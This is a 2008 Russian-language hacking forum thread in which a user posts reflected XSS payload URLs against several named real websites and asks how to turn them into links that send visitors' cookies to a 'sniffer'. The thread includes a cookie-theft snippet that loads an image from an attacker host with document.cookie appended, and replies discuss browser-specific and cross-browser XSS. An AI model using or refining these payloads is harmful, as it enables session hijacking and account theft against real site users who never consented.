
30.11.2008, 12:45
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
Сообщение от qazer
Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)
http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
собственно вставка вместо алерта запроса на снифер,вида
<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>
не пашет((
В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)
http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
в большинстве случаях фильтруются некоторые символы, например "+".
Сообщение от Pashkela
и что, а у меня опера, xss с расчетом на один браузер - гопота.
да, но иногда другого варианта нету. + приемы кроссбраузерности никто не отменял.
|
|
|